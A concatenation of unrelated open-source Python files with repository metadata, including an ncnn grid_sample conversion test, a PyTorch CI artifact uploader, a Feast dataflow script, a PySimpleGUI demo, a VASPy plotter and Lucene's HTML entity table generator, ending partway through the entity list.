parser = argparse.ArgumentParser(description='Actions documentation generator')
parser.add_argument('output', help='output file')
args = parser.parse_args()
doc = _build_docs()
with open(args.output, 'w') as f:
f.write(doc)
if __name__ == '__main__':
main()
|
10907270c790815044f954bfb26c6df232e42d81
|
d668209e9951d249020765c011a836f193004c01
|
/tools/pnnx/tests/test_F_grid_sample.py
|
8cb6d214568c669ba954780f801e8d50bd8df26f
|
[
"BSD-3-Clause",
"Zlib",
"BSD-2-Clause"
] |
permissive
|
Tencent/ncnn
|
d8371746c00439304c279041647362a723330a79
|
14b000d2b739bd0f169a9ccfeb042da06fa0a84a
|
refs/heads/master
| 2023-08-31T14:04:36.635201
| 2023-08-31T04:19:23
| 2023-08-31T04:19:23
| 95,879,426
| 18,818
| 4,491
|
NOASSERTION
| 2023-09-14T15:44:56
| 2017-06-30T10:55:37
|
C++
|
UTF-8
|
Python
| false
| false
| 4,794
|
py
|
test_F_grid_sample.py
|
# Tencent is pleased to support the open source community by making ncnn available.
#
# Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
import torch
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
def forward(self, x, xg1, xg2, y, yg1, yg2):
        # grid_sample expects grid coordinates in [-1, 1]; torch.rand yields [0, 1), so rescale
xg1 = xg1 * 2 - 1
xg2 = xg2 * 2 - 1
yg1 = yg1 * 2 - 1
yg2 = yg2 * 2 - 1
x = F.grid_sample(x, xg1, mode='bilinear', padding_mode='zeros', align_corners=False)
x = F.grid_sample(x, xg2, mode='bilinear', padding_mode='border', align_corners=False)
x = F.grid_sample(x, xg1, mode='bilinear', padding_mode='reflection', align_corners=False)
x = F.grid_sample(x, xg2, mode='nearest', padding_mode='zeros', align_corners=False)
x = F.grid_sample(x, xg1, mode='nearest', padding_mode='border', align_corners=False)
x = F.grid_sample(x, xg2, mode='nearest', padding_mode='reflection', align_corners=False)
x = F.grid_sample(x, xg1, mode='bicubic', padding_mode='zeros', align_corners=False)
x = F.grid_sample(x, xg2, mode='bicubic', padding_mode='border', align_corners=False)
x = F.grid_sample(x, xg1, mode='bicubic', padding_mode='reflection', align_corners=False)
x = F.grid_sample(x, xg2, mode='bilinear', padding_mode='zeros', align_corners=True)
x = F.grid_sample(x, xg1, mode='bilinear', padding_mode='border', align_corners=True)
x = F.grid_sample(x, xg2, mode='bilinear', padding_mode='reflection', align_corners=True)
x = F.grid_sample(x, xg1, mode='nearest', padding_mode='zeros', align_corners=True)
x = F.grid_sample(x, xg2, mode='nearest', padding_mode='border', align_corners=True)
x = F.grid_sample(x, xg1, mode='nearest', padding_mode='reflection', align_corners=True)
x = F.grid_sample(x, xg2, mode='bicubic', padding_mode='zeros', align_corners=True)
x = F.grid_sample(x, xg1, mode='bicubic', padding_mode='border', align_corners=True)
x = F.grid_sample(x, xg2, mode='bicubic', padding_mode='reflection', align_corners=True)
y = F.grid_sample(y, yg1, mode='bilinear', padding_mode='zeros', align_corners=False)
y = F.grid_sample(y, yg2, mode='bilinear', padding_mode='border', align_corners=False)
y = F.grid_sample(y, yg1, mode='bilinear', padding_mode='reflection', align_corners=False)
y = F.grid_sample(y, yg2, mode='nearest', padding_mode='zeros', align_corners=False)
y = F.grid_sample(y, yg1, mode='nearest', padding_mode='border', align_corners=False)
y = F.grid_sample(y, yg2, mode='nearest', padding_mode='reflection', align_corners=False)
y = F.grid_sample(y, yg1, mode='bilinear', padding_mode='zeros', align_corners=True)
y = F.grid_sample(y, yg2, mode='bilinear', padding_mode='border', align_corners=True)
y = F.grid_sample(y, yg1, mode='bilinear', padding_mode='reflection', align_corners=True)
y = F.grid_sample(y, yg2, mode='nearest', padding_mode='zeros', align_corners=True)
y = F.grid_sample(y, yg1, mode='nearest', padding_mode='border', align_corners=True)
y = F.grid_sample(y, yg2, mode='nearest', padding_mode='reflection', align_corners=True)
return x, y
def test():
net = Model()
net.eval()
torch.manual_seed(0)
x = torch.rand(1, 3, 12, 16)
xg1 = torch.rand(1, 21, 27, 2)
xg2 = torch.rand(1, 12, 16, 2)
y = torch.rand(1, 5, 10, 12, 16)
yg1 = torch.rand(1, 10, 21, 27, 3)
yg2 = torch.rand(1, 10, 12, 16, 3)
a0, a1 = net(x, xg1, xg2, y, yg1, yg2)
# export torchscript
mod = torch.jit.trace(net, (x, xg1, xg2, y, yg1, yg2))
mod.save("test_F_grid_sample.pt")
# torchscript to pnnx
import os
os.system("../src/pnnx test_F_grid_sample.pt inputshape=[1,3,12,16],[1,21,27,2],[1,12,16,2],[1,5,10,12,16],[1,10,21,27,3],[1,10,12,16,3]")
# pnnx inference
import test_F_grid_sample_pnnx
b0, b1 = test_F_grid_sample_pnnx.test_inference()
return torch.equal(a0, b0) and torch.equal(a1, b1)
if __name__ == "__main__":
if test():
exit(0)
else:
exit(1)
|
7c5ea1476d385ed8cdcbf04f187019fb7bf63348
|
afd2087e80478010d9df66e78280f75e1ff17d45
|
/tools/stats/upload_artifacts.py
|
eb0fde7f38ac2904d4ac68f412b4d3e40057bcda
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] |
permissive
|
pytorch/pytorch
|
7521ac50c47d18b916ae47a6592c4646c2cb69b5
|
a6f7dd4707ac116c0f5fb5f44f42429f38d23ab4
|
refs/heads/main
| 2023-08-03T05:05:02.822937
| 2023-08-03T00:40:33
| 2023-08-03T04:14:52
| 65,600,975
| 77,092
| 24,610
|
NOASSERTION
| 2023-09-14T21:58:39
| 2016-08-13T05:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 2,063
|
py
|
upload_artifacts.py
|
import argparse
import os
import re
from tempfile import TemporaryDirectory
from tools.stats.upload_stats_lib import download_gha_artifacts, upload_file_to_s3
ARTIFACTS = [
"sccache-stats",
"test-jsons",
"test-reports",
"usage-log",
]
BUCKET_NAME = "gha-artifacts"
FILENAME_REGEX = r"-runattempt\d+"
def get_artifacts(repo: str, workflow_run_id: int, workflow_run_attempt: int) -> None:
with TemporaryDirectory() as temp_dir:
print("Using temporary directory:", temp_dir)
os.chdir(temp_dir)
for artifact in ARTIFACTS:
artifact_paths = download_gha_artifacts(
artifact, workflow_run_id, workflow_run_attempt
)
for artifact_path in artifact_paths:
# GHA artifact is named as follows: NAME-runattempt${{ github.run_attempt }}-SUFFIX.zip
                # and we want to remove the run_attempt to conform with the naming convention on S3, i.e.
# pytorch/pytorch/WORKFLOW_ID/RUN_ATTEMPT/artifact/NAME-SUFFIX.zip
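                # e.g. "test-reports-runattempt2-linux.zip" -> "test-reports-linux.zip"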
s3_filename = re.sub(FILENAME_REGEX, "", artifact_path.name)
upload_file_to_s3(
file_name=str(artifact_path.resolve()),
bucket=BUCKET_NAME,
key=f"{repo}/{workflow_run_id}/{workflow_run_attempt}/artifact/{s3_filename}",
)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Upload test artifacts from GHA to S3")
parser.add_argument(
"--workflow-run-id",
type=int,
required=True,
help="id of the workflow to get artifacts from",
)
parser.add_argument(
"--workflow-run-attempt",
type=int,
required=True,
help="which retry of the workflow this is",
)
parser.add_argument(
"--repo",
type=str,
required=True,
help="which GitHub repo this workflow run belongs to",
)
args = parser.parse_args()
get_artifacts(args.repo, args.workflow_run_id, args.workflow_run_attempt)
|
07a177466c75d8d6a6b997d6e9c9522f381b2d29
|
07ca66b6bc4d7a94ae78e6c622899458f1bb54fd
|
/sdk/python/feast/infra/materialization/contrib/bytewax/dataflow.py
|
e3d95e2a75cdc868ac8abf5a7e6b93ac78bd69fc
|
[
"Apache-2.0"
] |
permissive
|
feast-dev/feast
|
8136454dec73275d18133b96f74c3fec8abc57e8
|
58aff346832ebde1695a47cf724da3d65a4a8c53
|
refs/heads/master
| 2023-08-31T03:35:16.188051
| 2023-08-28T06:25:39
| 2023-08-28T06:25:39
| 161,133,770
| 3,956
| 754
|
Apache-2.0
| 2023-09-14T11:17:15
| 2018-12-10T07:20:15
|
Python
|
UTF-8
|
Python
| false
| false
| 728
|
py
|
dataflow.py
|
import yaml
from feast import FeatureStore, RepoConfig
from feast.infra.materialization.contrib.bytewax.bytewax_materialization_dataflow import (
BytewaxMaterializationDataflow,
)
if __name__ == "__main__":
with open("/var/feast/feature_store.yaml") as f:
feast_config = yaml.safe_load(f)
with open("/var/feast/bytewax_materialization_config.yaml") as b:
bytewax_config = yaml.safe_load(b)
config = RepoConfig(**feast_config)
store = FeatureStore(config=config)
job = BytewaxMaterializationDataflow(
config,
store.get_feature_view(bytewax_config["feature_view"]),
bytewax_config["paths"],
)
|
40f76d884f757668b12521ddf27187a9c0da3a85
|
55c5e55612f2d04294c02cec728729bdb1b323c8
|
/xianhuan/pysimplegui/demo.py
|
2a6d776956a05216a150aaed5f91d7becf169348
|
[] |
no_license
|
JustDoPython/python-examples
|
4efc9e3aafd533938b23012dbc72aeb175a87744
|
d4159751a86b1e9ce7867d0a7f1c12e8b8e0f213
|
refs/heads/master
| 2023-03-16T01:34:24.219119
| 2023-03-08T10:37:33
| 2023-03-08T10:37:33
| 249,331,676
| 423
| 423
| null | 2023-02-17T07:49:04
| 2020-03-23T04:00:26
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 576
|
py
|
demo.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: 闲欢
"""
import PySimpleGUI as sg
layout = [
    [sg.Text('Sum up Python in one sentence')],
    [sg.Input(key='-INPUT111-')],
    [sg.Input(key='-INPUT222-')],
    [sg.Button('OK'), sg.Button('Cancel')],
    [sg.Text('Output:'), sg.Text(key='-OUTPUT-')]
]
window = sg.Window('PySimpleGUI Demo', layout)
while True:
    event, values = window.read()  # blocks until a button is clicked or the window closes
    print(event)
    print(values)
    if event in (None, 'Cancel'):  # window closed or Cancel pressed
        break
    else:
        window['-OUTPUT-'].update(values['-INPUT222-'])
window.close()
|
d18e9d0002b84065c2f6bba5483ece47951cae62
|
a4cf941458c1c463da18f6286219a753ac74ede6
|
/vaspy/plotter.py
|
f5ad1a4a63a7c567290af8ee8b5da158b1aedb78
|
[
"MIT"
] |
permissive
|
PytLab/VASPy
|
d40926c614201225de0db7d50deb28b8b7d5cdba
|
a48bb43842bb87c07c6a4c7943b8d280e2e8889b
|
refs/heads/master
| 2022-07-04T21:07:25.646905
| 2022-06-19T13:15:41
| 2022-06-19T13:15:41
| 40,174,641
| 266
| 112
|
MIT
| 2022-06-19T13:15:42
| 2015-08-04T09:10:20
|
Python
|
UTF-8
|
Python
| false
| false
| 2,520
|
py
|
plotter.py
|
# -*- coding:utf-8 -*-
"""
========================================================================
Provide pure data file class which do operations on these files.
========================================================================
Written by PytLab <shaozhengjiang@gmail.com>, September 2015
Updated by PytLab <shaozhengjiang@gmail.com>, September 2015
========================================================================
"""
import numpy as np
# whether pyplot installed
try:
import matplotlib.pyplot as plt
plt_installed = True
except ImportError:
print('Warning: Module matplotlib.pyplot is not installed')
plt_installed = False
from vaspy.functions import line2list
class DataPlotter(object):
def __init__(self, filename, field=' ', dtype=float):
self.filename = filename
self.field = field
self.dtype = dtype
        # load data
self.load()
def load(self):
"Load all data in file into array."
data = []
with open(self.filename, 'r') as f:
for line in f:
line = line.strip()
if not line: # blank line
continue
                if not line[0].isdigit():  # comment line, unless it begins a negative number
                    if not line.startswith('-'):
                        continue
                    elif not line[1].isdigit() and line[1] != '.':
                        continue
linedata = line2list(line, field=self.field,
dtype=self.dtype)
data.append(linedata)
self.data = np.array(data)
return data
def plot2d(self, xcol, ycols):
"显示特定两列数据"
'''
Parameter
---------
xcol: int
column number of data for x values
ycols: tuple of int
column numbers of data for y values
(start, stop[, step])
Example:
>>> a.plot2d(0, (1, 3, 1))
'''
x = self.data[:, xcol]
fig = plt.figure()
ax = fig.add_subplot(111)
for i in range(*ycols):
y = self.data[:, i]
ax.plot(x, y, linewidth=3)
fig.show()
def plotall(self):
"将所有数据一起显示"
ncols = self.data.shape[1]
x = self.data[:, 0]
fig = plt.figure()
ax = fig.add_subplot(111)
for col in range(1, ncols):
y = self.data[:, col]
ax.plot(x, y, linewidth=3)
fig.show()
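A minimal usage sketch (the file name and column choices are illustrative):

# Load a whitespace-separated numeric data file, then plot columns 1-2 against column 0.
plotter = DataPlotter('data.txt')
plotter.plot2d(0, (1, 3))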
|
66e0238fed4e069addbbdb93179b1457fc3a5203
|
8d0207d19138ed986f40c4ddb7bbee67f8d9eb66
|
/gradle/generation/jflex/htmlentity.py
|
3eaf7acc5e52a38eaf780c72cad6d9d4a30fc179
|
[
"Apache-2.0",
"MIT",
"NAIST-2003",
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-unicode",
"LGPL-2.0-or-later",
"ICU",
"LicenseRef-scancode-unicode-mappings",
"CC-BY-SA-3.0",
"Python-2.0",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
apache/lucene
|
0a0121aaf8e6808cc859b2e91ef386660a702495
|
9fd45e3951d941edbe575d41d900af589bbbe5df
|
refs/heads/main
| 2023-09-04T02:17:05.678297
| 2023-09-01T18:05:49
| 2023-09-01T18:05:49
| 341,631,350
| 1,964
| 868
|
Apache-2.0
| 2023-09-14T16:20:46
| 2021-02-23T17:16:56
|
Java
|
UTF-8
|
Python
| false
| false
| 31,397
|
py
|
htmlentity.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import sys
# A simple python script to generate an HTML entity map and a regex alternation
# for inclusion in HTMLStripCharFilter.jflex.
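# Usage: python htmlentity.py <output-file>  (argv[1] receives the generated jflex fragment)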
def main():
with open(sys.argv[1], 'w') as f:
sys.stdout = f
print(get_apache_license())
codes = {}
regex = re.compile(r'\s*<!ENTITY\s+(\S+)\s+"&(?:#38;)?#(\d+);"')
for line in get_entity_text().split('\n'):
match = regex.match(line)
if match:
key = match.group(1)
                if key == 'quot': codes[key] = r'\"'
                elif key == 'nbsp': codes[key] = ' '
                else: codes[key] = r'\u%04X' % int(match.group(2))
keys = sorted(codes)
first_entry = True
output_line = 'CharacterEntities = ( '
for key in keys:
new_entry = ('"%s"' if first_entry else ' | "%s"') % key
first_entry = False
if len(output_line) + len(new_entry) >= 80:
print(output_line)
output_line = ' '
output_line += new_entry
if key in ('quot','copy','gt','lt','reg','amp'):
new_entry = ' | "%s"' % key.upper()
if len(output_line) + len(new_entry) >= 80:
print(output_line)
output_line = ' '
output_line += new_entry
print(output_line, ')')
print('%{')
print(' private static final Map<String,String> upperCaseVariantsAccepted')
print(' = new HashMap<>();')
print(' static {')
print(' upperCaseVariantsAccepted.put("quot", "QUOT");')
print(' upperCaseVariantsAccepted.put("copy", "COPY");')
print(' upperCaseVariantsAccepted.put("gt", "GT");')
print(' upperCaseVariantsAccepted.put("lt", "LT");')
print(' upperCaseVariantsAccepted.put("reg", "REG");')
print(' upperCaseVariantsAccepted.put("amp", "AMP");')
print(' }')
print(' private static final CharArrayMap<Character> entityValues')
print(' = new CharArrayMap<>(%i, false);' % len(keys))
print(' static {')
print(' String[] entities = {')
output_line = ' '
for key in keys:
new_entry = ' "%s", "%s",' % (key, codes[key])
if len(output_line) + len(new_entry) >= 80:
print(output_line)
output_line = ' '
output_line += new_entry
print(output_line[:-1])
print(' };')
print(' for (int i = 0 ; i < entities.length ; i += 2) {')
print(' Character value = entities[i + 1].charAt(0);')
print(' entityValues.put(entities[i], value);')
print(' String upperCaseVariant = upperCaseVariantsAccepted.get(entities[i]);')
print(' if (upperCaseVariant != null) {')
print(' entityValues.put(upperCaseVariant, value);')
print(' }')
print(' }')
print(" }")
print("%}")
def get_entity_text():
# The text below is taken verbatim from
# <http://www.w3.org/TR/REC-html40/sgml/entities.html>:
text = r"""
F.1. XHTML Character Entities
XHTML DTDs make available a standard collection of named character entities. Those entities are defined in this section.
F.1.1. XHTML Latin 1 Character Entities
You can download this version of this file from http://www.w3.org/TR/2010/REC-xhtml-modularization/DTD/xhtml-lat1.ent. The latest version is available at http://www.w3.org/MarkUp/DTD/xhtml-lat1.ent.
<!-- ...................................................................... -->
<!-- XML-compatible ISO Latin 1 Character Entity Set for XHTML ............ -->
<!-- file: xhtml-lat1.ent
Typical invocation:
<!ENTITY % xhtml-lat1
PUBLIC "-//W3C//ENTITIES Latin 1 for XHTML//EN"
"xhtml-lat1.ent" >
%xhtml-lat1;
This DTD module is identified by the PUBLIC and SYSTEM identifiers:
PUBLIC "-//W3C//ENTITIES Latin 1 for XHTML//EN"
SYSTEM "http://www.w3.org/MarkUp/DTD/xhtml-lat1.ent"
Revision: Id: xhtml-lat1.ent,v 4.1 2001/04/10 09:34:14 altheim Exp $ SMI
Portions (C) International Organization for Standardization 1986:
Permission to copy in any form is granted for use with conforming
SGML systems and applications as defined in ISO 8879, provided
this notice is included in all copies.
-->
<!ENTITY nbsp " " ><!-- no-break space = non-breaking space, U+00A0 ISOnum -->
<!ENTITY iexcl "¡" ><!-- inverted exclamation mark, U+00A1 ISOnum -->
<!ENTITY cent "¢" ><!-- cent sign, U+00A2 ISOnum -->
<!ENTITY pound "£" ><!-- pound sign, U+00A3 ISOnum -->
<!ENTITY curren "¤" ><!-- currency sign, U+00A4 ISOnum -->
<!ENTITY yen "¥" ><!-- yen sign = yuan sign, U+00A5 ISOnum -->
<!ENTITY brvbar "¦" ><!-- broken bar = broken vertical bar, U+00A6 ISOnum -->
<!ENTITY sect "§" ><!-- section sign, U+00A7 ISOnum -->
<!ENTITY uml "¨" ><!-- diaeresis = spacing diaeresis, U+00A8 ISOdia -->
<!ENTITY copy "©" ><!-- copyright sign, U+00A9 ISOnum -->
<!ENTITY ordf "ª" ><!-- feminine ordinal indicator, U+00AA ISOnum -->
<!ENTITY laquo "«" ><!-- left-pointing double angle quotation mark = left pointing guillemet, U+00AB ISOnum -->
<!ENTITY not "¬" ><!-- not sign, U+00AC ISOnum -->
<!ENTITY shy "­" ><!-- soft hyphen = discretionary hyphen, U+00AD ISOnum -->
<!ENTITY reg "®" ><!-- registered sign = registered trade mark sign, U+00AE ISOnum -->
<!ENTITY macr "¯" ><!-- macron = spacing macron = overline = APL overbar, U+00AF ISOdia -->
<!ENTITY deg "°" ><!-- degree sign, U+00B0 ISOnum -->
<!ENTITY plusmn "±" ><!-- plus-minus sign = plus-or-minus sign, U+00B1 ISOnum -->
<!ENTITY sup2 "²" ><!-- superscript two = superscript digit two = squared, U+00B2 ISOnum -->
<!ENTITY sup3 "³" ><!-- superscript three = superscript digit three = cubed, U+00B3 ISOnum -->
<!ENTITY acute "´" ><!-- acute accent = spacing acute, U+00B4 ISOdia -->
<!ENTITY micro "µ" ><!-- micro sign, U+00B5 ISOnum -->
<!ENTITY para "¶" ><!-- pilcrow sign = paragraph sign, U+00B6 ISOnum -->
<!ENTITY middot "·" ><!-- middle dot = Georgian comma = Greek middle dot, U+00B7 ISOnum -->
<!ENTITY cedil "¸" ><!-- cedilla = spacing cedilla, U+00B8 ISOdia -->
<!ENTITY sup1 "¹" ><!-- superscript one = superscript digit one, U+00B9 ISOnum -->
<!ENTITY ordm "º" ><!-- masculine ordinal indicator, U+00BA ISOnum -->
<!ENTITY raquo "»" ><!-- right-pointing double angle quotation mark = right pointing guillemet, U+00BB ISOnum -->
<!ENTITY frac14 "¼" ><!-- vulgar fraction one quarter = fraction one quarter, U+00BC ISOnum -->
<!ENTITY frac12 "½" ><!-- vulgar fraction one half = fraction one half, U+00BD ISOnum -->
<!ENTITY frac34 "¾" ><!-- vulgar fraction three quarters = fraction three quarters, U+00BE ISOnum -->
<!ENTITY iquest "¿" ><!-- inverted question mark = turned question mark, U+00BF ISOnum -->
<!ENTITY Agrave "À" ><!-- latin capital A with grave = latin capital A grave, U+00C0 ISOlat1 -->
<!ENTITY Aacute "Á" ><!-- latin capital A with acute, U+00C1 ISOlat1 -->
<!ENTITY Acirc "Â" ><!-- latin capital A with circumflex, U+00C2 ISOlat1 -->
<!ENTITY Atilde "Ã" ><!-- latin capital A with tilde, U+00C3 ISOlat1 -->
<!ENTITY Auml "Ä" ><!-- latin capital A with diaeresis, U+00C4 ISOlat1 -->
<!ENTITY Aring "Å" ><!-- latin capital A with ring above = latin capital A ring, U+00C5 ISOlat1 -->
<!ENTITY AElig "Æ" ><!-- latin capital AE = latin capital ligature AE, U+00C6 ISOlat1 -->
<!ENTITY Ccedil "Ç" ><!-- latin capital C with cedilla, U+00C7 ISOlat1 -->
<!ENTITY Egrave "È" ><!-- latin capital E with grave, U+00C8 ISOlat1 -->
<!ENTITY Eacute "É" ><!-- latin capital E with acute, U+00C9 ISOlat1 -->
<!ENTITY Ecirc "Ê" ><!-- latin capital E with circumflex, U+00CA ISOlat1 -->
<!ENTITY Euml "Ë" ><!-- latin capital E with diaeresis, U+00CB ISOlat1 -->
<!ENTITY Igrave "Ì" ><!-- latin capital I with grave, U+00CC ISOlat1 -->
<!ENTITY Iacute "Í" ><!-- latin capital I with acute, U+00CD ISOlat1 -->
<!ENTITY Icirc "Î" ><!-- latin capital I with circumflex, U+00CE ISOlat1 -->
<!ENTITY Iuml "Ï" ><!-- latin capital I with diaeresis, U+00CF ISOlat1 -->
<!ENTITY ETH "Ð" ><!-- latin capital ETH, U+00D0 ISOlat1 -->
<!ENTITY Ntilde "Ñ" ><!-- latin capital N with tilde, U+00D1 ISOlat1 -->
<!ENTITY Ograve "Ò" ><!-- latin capital O with grave, U+00D2 ISOlat1 -->
<!ENTITY Oacute "Ó" ><!-- latin capital O with acute, U+00D3 ISOlat1 -->
<!ENTITY Ocirc "Ô" ><!-- latin capital O with circumflex, U+00D4 ISOlat1 -->
<!ENTITY Otilde "Õ" ><!-- latin capital O with tilde, U+00D5 ISOlat1 -->
<!ENTITY Ouml "Ö" ><!-- latin capital O with diaeresis, U+00D6 ISOlat1 -->
<!ENTITY times "×" ><!-- multiplication sign, U+00D7 ISOnum -->
<!ENTITY Oslash "Ø" ><!-- latin capital O with stroke = latin capital O slash, U+00D8 ISOlat1 -->
<!ENTITY Ugrave "Ù" ><!-- latin capital U with grave, U+00D9 ISOlat1 -->
<!ENTITY Uacute "Ú" ><!-- latin capital U with acute, U+00DA ISOlat1 -->
<!ENTITY Ucirc "Û" ><!-- latin capital U with circumflex, U+00DB ISOlat1 -->
<!ENTITY Uuml "Ü" ><!-- latin capital U with diaeresis, U+00DC ISOlat1 -->
<!ENTITY Yacute "Ý" ><!-- latin capital Y with acute, U+00DD ISOlat1 -->
<!ENTITY THORN "Þ" ><!-- latin capital THORN, U+00DE ISOlat1 -->
<!ENTITY szlig "ß" ><!-- latin small sharp s = ess-zed, U+00DF ISOlat1 -->
<!ENTITY agrave "à" ><!-- latin small a with grave = latin small a grave, U+00E0 ISOlat1 -->
<!ENTITY aacute "á" ><!-- latin small a with acute, U+00E1 ISOlat1 -->
<!ENTITY acirc "â" ><!-- latin small a with circumflex, U+00E2 ISOlat1 -->
<!ENTITY atilde "ã" ><!-- latin small a with tilde, U+00E3 ISOlat1 -->
<!ENTITY auml "ä" ><!-- latin small a with diaeresis, U+00E4 ISOlat1 -->
<!ENTITY aring "å" ><!-- latin small a with ring above = latin small a ring, U+00E5 ISOlat1 -->
<!ENTITY aelig "æ" ><!-- latin small ae = latin small ligature ae, U+00E6 ISOlat1 -->
<!ENTITY ccedil "ç" ><!-- latin small c with cedilla, U+00E7 ISOlat1 -->
<!ENTITY egrave "è" ><!-- latin small e with grave, U+00E8 ISOlat1 -->
<!ENTITY eacute "é" ><!-- latin small e with acute, U+00E9 ISOlat1 -->
<!ENTITY ecirc "ê" ><!-- latin small e with circumflex, U+00EA ISOlat1 -->
<!ENTITY euml "ë" ><!-- latin small e with diaeresis, U+00EB ISOlat1 -->
<!ENTITY igrave "ì" ><!-- latin small i with grave, U+00EC ISOlat1 -->
<!ENTITY iacute "í" ><!-- latin small i with acute, U+00ED ISOlat1 -->
<!ENTITY icirc "î" ><!-- latin small i with circumflex, U+00EE ISOlat1 -->
<!ENTITY iuml "ï" ><!-- latin small i with diaeresis, U+00EF ISOlat1 -->
<!ENTITY eth "ð" ><!-- latin small eth, U+00F0 ISOlat1 -->
<!ENTITY ntilde "ñ" ><!-- latin small n with tilde, U+00F1 ISOlat1 -->
<!ENTITY ograve "ò" ><!-- latin small o with grave, U+00F2 ISOlat1 -->
<!ENTITY oacute "ó" ><!-- latin small o with acute, U+00F3 ISOlat1 -->
<!ENTITY ocirc "ô" ><!-- latin small o with circumflex, U+00F4 ISOlat1 -->
<!ENTITY otilde "õ" ><!-- latin small o with tilde, U+00F5 ISOlat1 -->
<!ENTITY ouml "ö" ><!-- latin small o with diaeresis, U+00F6 ISOlat1 -->
<!ENTITY divide "÷" ><!-- division sign, U+00F7 ISOnum -->
<!ENTITY oslash "ø" ><!-- latin small o with stroke, = latin small o slash, U+00F8 ISOlat1 -->
<!ENTITY ugrave "ù" ><!-- latin small u with grave, U+00F9 ISOlat1 -->
<!ENTITY uacute "ú" ><!-- latin small u with acute, U+00FA ISOlat1 -->
<!ENTITY ucirc "û" ><!-- latin small u with circumflex, U+00FB ISOlat1 -->
<!ENTITY uuml "ü" ><!-- latin small u with diaeresis, U+00FC ISOlat1 -->
<!ENTITY yacute "ý" ><!-- latin small y with acute, U+00FD ISOlat1 -->
<!ENTITY thorn "þ" ><!-- latin small thorn with, U+00FE ISOlat1 -->
<!ENTITY yuml "ÿ" ><!-- latin small y with diaeresis, U+00FF ISOlat1 -->
<!-- end of xhtml-lat1.ent -->
F.1.2. XHTML Special Characters
You can download this version of this file from http://www.w3.org/TR/2010/REC-xhtml-modularization/DTD/xhtml-special.ent. The latest version is available at http://www.w3.org/MarkUp/DTD/xhtml-special.ent.
<!-- ...................................................................... -->
<!-- XML-compatible ISO Special Character Entity Set for XHTML ............ -->
<!-- file: xhtml-special.ent
Typical invocation:
<!ENTITY % xhtml-special
PUBLIC "-//W3C//ENTITIES Special for XHTML//EN"
"xhtml-special.ent" >
%xhtml-special;
This DTD module is identified by the PUBLIC and SYSTEM identifiers:
PUBLIC "-//W3C//ENTITIES Special for XHTML//EN"
SYSTEM "http://www.w3.org/MarkUp/DTD/xhtml-special.ent"
Revision: Id: xhtml-special.ent,v 4.1 2001/04/10 09:34:14 altheim Exp $ SMI
Portions (C) International Organization for Standardization 1986:
Permission to copy in any form is granted for use with conforming
SGML systems and applications as defined in ISO 8879, provided
this notice is included in all copies.
Revisions:
2000-10-28: added ' and altered XML Predefined Entities for compatibility
-->
<!-- Relevant ISO entity set is given unless names are newly introduced.
New names (i.e., not in ISO 8879 [SGML] list) do not clash with
any existing ISO 8879 entity names. ISO 10646 [ISO10646] character
numbers are given for each character, in hex. Entity values are
decimal conversions of the ISO 10646 values and refer to the
document character set. Names are Unicode [UNICODE] names.
-->
<!-- C0 Controls and Basic Latin -->
<!ENTITY lt "&#60;" ><!-- less-than sign, U+003C ISOnum -->
<!ENTITY gt ">" ><!-- greater-than sign, U+003E ISOnum -->
<!ENTITY amp "&#38;" ><!-- ampersand, U+0026 ISOnum -->
<!ENTITY apos "'" ><!-- The Apostrophe (Apostrophe Quote, APL Quote), U+0027 ISOnum -->
<!ENTITY quot """ ><!-- quotation mark (Quote Double), U+0022 ISOnum -->
<!-- Latin Extended-A -->
<!ENTITY OElig "Œ" ><!-- latin capital ligature OE, U+0152 ISOlat2 -->
<!ENTITY oelig "œ" ><!-- latin small ligature oe, U+0153 ISOlat2 -->
<!-- ligature is a misnomer, this is a separate character in some languages -->
<!ENTITY Scaron "Š" ><!-- latin capital letter S with caron, U+0160 ISOlat2 -->
<!ENTITY scaron "š" ><!-- latin small letter s with caron, U+0161 ISOlat2 -->
<!ENTITY Yuml "Ÿ" ><!-- latin capital letter Y with diaeresis, U+0178 ISOlat2 -->
<!-- Spacing Modifier Letters -->
<!ENTITY circ "ˆ" ><!-- modifier letter circumflex accent, U+02C6 ISOpub -->
<!ENTITY tilde "˜" ><!-- small tilde, U+02DC ISOdia -->
<!-- General Punctuation -->
<!ENTITY ensp " " ><!-- en space, U+2002 ISOpub -->
<!ENTITY emsp " " ><!-- em space, U+2003 ISOpub -->
<!ENTITY thinsp " " ><!-- thin space, U+2009 ISOpub -->
<!ENTITY zwnj "‌" ><!-- zero width non-joiner, U+200C NEW RFC 2070 -->
<!ENTITY zwj "‍" ><!-- zero width joiner, U+200D NEW RFC 2070 -->
<!ENTITY lrm "‎" ><!-- left-to-right mark, U+200E NEW RFC 2070 -->
<!ENTITY rlm "‏" ><!-- right-to-left mark, U+200F NEW RFC 2070 -->
<!ENTITY ndash "–" ><!-- en dash, U+2013 ISOpub -->
<!ENTITY mdash "—" ><!-- em dash, U+2014 ISOpub -->
<!ENTITY lsquo "‘" ><!-- left single quotation mark, U+2018 ISOnum -->
<!ENTITY rsquo "’" ><!-- right single quotation mark, U+2019 ISOnum -->
